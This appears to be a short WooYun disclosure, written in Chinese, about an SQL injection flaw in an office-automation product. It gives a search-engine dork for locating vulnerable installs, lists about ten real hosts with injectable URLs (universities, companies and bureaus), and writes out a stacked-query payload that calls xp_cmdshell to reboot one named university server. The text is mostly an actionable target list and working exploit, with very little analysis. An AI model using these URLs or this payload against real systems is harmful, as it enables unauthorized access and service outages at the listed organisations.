WooYun.org

google关键字inurl:loginfail.htm
只给出这一个，结果不是很多。其他的厂商有名单 - -
注入点，不需登录
登录页写
请使用 IE 浏览器 6.0 以上版本，系统最佳工作分辨率为 1024 x 768
的可以注入
http://202.97.156.244/Source/ComnInfo/InfoContent.aspx?CatID=1&InfoID=6136'
http://58.42.233.82/Source/ComnInfo/InfoContent.aspx?CatID=1&InfoID=6136'
http://oa.crfeb5.com.cn/Source/ComnInfo/InfoContent.aspx?CatID=1&InfoID=6136'
http://119.167.68.30:8080/Source/ComnInfo/InfoContent.aspx?CatID=1&InfoID=6136'
http://oa.cr8gc.com/Source/ComnInfo/InfoContent.aspx?CatID=1&InfoID=6136'
http://oa.xidian.edu.cn/Source/ComnInfo/InfoContent.aspx?CatID=1&InfoID=6136'
http://dealer.ts.com.cn:800/Source/ComnInfo/InfoContent.aspx?CatID=1&InfoID=6136’
http://61.157.78.154/Source/ComnInfo/InfoContent.aspx?CatID=1&InfoID=6136'
http://oa.cscec8b.com.cn/Source/ComnInfo/InfoContent.aspx?CatID=1&InfoID=6136'
http://218.65.5.163:800/Source/ComnInfo/InfoContent.aspx?CatID=1&InfoID=6136'
列举部分，各种局各种集团各种大学。
http://oa.xidian.edu.cn/Source/ComnInfo/InfoContent.aspx?CatID=1&InfoID=6136));exec master.dbo.xp_cmdshell 'shutdown -r -t 0'--
可以直接重启服务器。
说明一点。多行后，返回未登录说明语句正确已经执行。